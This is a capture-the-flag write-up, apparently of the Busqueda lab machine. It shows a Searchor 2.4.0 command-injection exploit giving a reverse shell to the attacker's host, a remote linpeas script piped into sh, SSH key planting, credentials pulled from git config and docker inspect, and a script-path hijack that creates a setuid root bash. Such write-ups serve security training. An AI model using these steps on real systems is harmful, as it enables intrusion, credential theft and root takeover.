Busqueda

Recon

nmap_scan.log

HTTP (80)

The application allows us to search (?)

Writeup.png

Main endpoint is /search, if we include " there's output, but ' doesn't return anything.

Writeup-1.png
<p class="copyright">
  Powered by
  <a
    style="color: black"
    target="_blank"
    href="https://flask.palletsprojects.com"
    >Flask</a
  >
  and
  <a
    style="color: black"
    target="_blank"
    href="https://github.com/ArjunSharda/Searchor"
    >Searchor 2.4.0</a
  >
</p>

RCE

Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

└─$ git clone https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection.git
└─$ bash Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection/exploit.sh http://searcher.htb/ 10.10.14.42 4444
...
Writeup-2.png

Reverse Shell

svc@busqueda:/var/www/app$ id
uid=1000(svc) gid=1000(svc) groups=1000(svc)

User.txt

svc@busqueda:~$ cat user.txt
699a3f07b499c6bd4fbe33ddeb5cc34c

Privilege Escalation

Upgrade shell to SSH:

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken
---
svc@busqueda:~$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINC9MDaxPorytmkFkFBCWa95kksRBqlAwfXNOycqlPRe woyag@kraken' > ~/.ssh/authorized_keys
---
└─$ ssh svc@searcher.htb -i id_rsa

Gitea is running locally on port 3000

svc@busqueda:~$ ss -utnlp4
Netid          State           Recv-Q          Send-Q                    Local Address:Port                      Peer Address:Port          Process
udp            UNCONN          0               0                         127.0.0.53%lo:53                             0.0.0.0:*
udp            UNCONN          0               0                               0.0.0.0:68                             0.0.0.0:*
tcp            LISTEN          0               4096                      127.0.0.53%lo:53                             0.0.0.0:*
tcp            LISTEN          0               128                             0.0.0.0:22                             0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:3000                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:222                            0.0.0.0:*
tcp            LISTEN          0               128                           127.0.0.1:5000                           0.0.0.0:*              users:(("python3",pid=1547,fd=6),("python3",pid=1547,fd=4))
tcp            LISTEN          0               4096                          127.0.0.1:3306                           0.0.0.0:*
tcp            LISTEN          0               4096                          127.0.0.1:40683                          0.0.0.0:*

Enumerate with linpeas

svc@busqueda:~$ curl 10.10.14.42/lp.sh|sh|tee lp.log
...
══╣ PHP exec extensions
...
lrwxrwxrwx 1 root root 35 Dec  1  2022 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:5000/
        ProxyPassReverse / http://127.0.0.1:5000/
        RewriteEngine On
        RewriteCond %{HTTP_HOST} !^searcher.htb$
        RewriteRule /.* http://searcher.htb/ [R]
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
        ProxyPreserveHost On
        ServerName gitea.searcher.htb
        ServerAdmin admin@searcher.htb
        ProxyPass / http://127.0.0.1:3000/
        ProxyPassReverse / http://127.0.0.1:3000/
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
...
╔══════════╣ Analyzing Github Files (limit 70)
...
-rw-rw-r-- 1 svc svc 109 Nov 24 19:03 /home/svc/.gitconfig
[user]
        email = cody@searcher.htb
        name = cody
[core]
        hooksPath = no-hooks
[safe]
        directory = /var/www/app

drwxr-x--- 8 root root 4096 Apr  3  2023 /opt/scripts/.git
drwxr-xr-x 8 www-data www-data 4096 Nov 24 18:52 /var/www/app/.git

Check opt. No read permissions, only execute.

svc@busqueda:/opt/scripts$ ls -alh
total 28K
drwxr-xr-x 3 root root 4.0K Dec 24  2022 .
drwxr-xr-x 4 root root 4.0K Mar  1  2023 ..
-rwx--x--x 1 root root  586 Dec 24  2022 check-ports.py
-rwx--x--x 1 root root  857 Dec 24  2022 full-checkup.sh
drwxr-x--- 8 root root 4.0K Apr  3  2023 .git
-rwx--x--x 1 root root 3.3K Dec 24  2022 install-flask.sh
-rwx--x--x 1 root root 1.9K Dec 24  2022 system-checkup.py

If we go back to the app we can retrieve git credentials and find cody's password.

svc@busqueda:/var/www/app$ git config --list
user.email=cody@searcher.htb
user.name=cody
core.hookspath=no-hooks
safe.directory=/var/www/app
core.repositoryformatversion=0
core.filemode=true
core.bare=false
core.logallrefupdates=true
remote.origin.url=http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
remote.origin.fetch=+refs/heads/*:refs/remotes/origin/*
branch.main.remote=origin
branch.main.merge=refs/heads/main

Port forward Gitea

└─$ ssh svc@searcher.htb -i id_rsa -L 3000:0:3000
Writeup-3.png

Nothing there, but this password belongs to svc Linux user:

svc@busqueda:/var/www/app$ sudo -l
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py .
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
     
svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID   IMAGE                COMMAND                  CREATED         STATUS          PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   22 months ago   Up 35 minutes   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   22 months ago   Up 35 minutes   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

https://docs.docker.com/reference/cli/docker/inspect/

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea/gitea:latest
{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"sha256:934d81f1d0494b0ddfd08a1421735360ad394d4b9f4f419a87d3e2c51dfec10e","Volumes":{"/data":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

svc@busqueda:/var/www/app$ sudo -u root /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' 960
{"Hostname":"960873171e2e","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"22/tcp":{},"3000/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["USER_UID=115","USER_GID=121","GITEA__database__DB_TYPE=mysql","GITEA__database__HOST=db:3306","GITEA__database__NAME=gitea","GITEA__database__USER=gitea","GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","USER=git","GITEA_CUSTOM=/data/gitea"],"Cmd":["/bin/s6-svscan","/etc/s6"],"Image":"gitea/gitea:latest","Volumes":{"/data":{},"/etc/localtime":{},"/etc/timezone":{}},"WorkingDir":"","Entrypoint":["/usr/bin/entrypoint"],"OnBuild":null,"Labels":{"com.docker.compose.config-hash":"e9e6ff8e594f3a8c77b688e35f3fe9163fe99c66597b19bdd03f9256d630f515","com.docker.compose.container-number":"1","com.docker.compose.oneoff":"False","com.docker.compose.project":"docker","com.docker.compose.project.config_files":"docker-compose.yml","com.docker.compose.project.working_dir":"/root/scripts/docker","com.docker.compose.service":"server","com.docker.compose.version":"1.29.2","maintainer":"maintainers@gitea.io","org.opencontainers.image.created":"2022-11-24T13:22:00Z","org.opencontainers.image.revision":"9bccc60cf51f3b4070f5506b042a3d9a1442c73d","org.opencontainers.image.source":"https://github.com/go-gitea/gitea.git","org.opencontainers.image.url":"https://github.com/go-gitea/gitea"}}

When we use container ID it shows more information (???)

1. "GITEA__database__USER=gitea",
2. "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",

We can now login as administrator on Gitea

Creds: administrator:yuiu1hoiu4i5ho1uh

Writeup-4.png

http://localhost:3000/administrator/scripts/src/branch/main/system-checkup.py

The full-checkup option seems to be running script from local directory and not /opt/scripts and we can take advantage of that.

Writeup-5.png
svc@busqueda:/tmp$ cd /tmp
echo -e '#!/bin/bash\ninstall -m 4777 /bin/bash /tmp/rootbash' > full-checkup.sh
chmod +x full-checkup.sh
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
/tmp/rootbash -p

[+] Done!
rootbash-5.1# id
uid=1000(svc) gid=1000(svc) euid=0(root) groups=1000(svc)

Root.txt

rootbash-5.1# cat root.txt
5c07065f231ea771d167f02aa0dfac31
PreviousAgileNextFormat

Last updated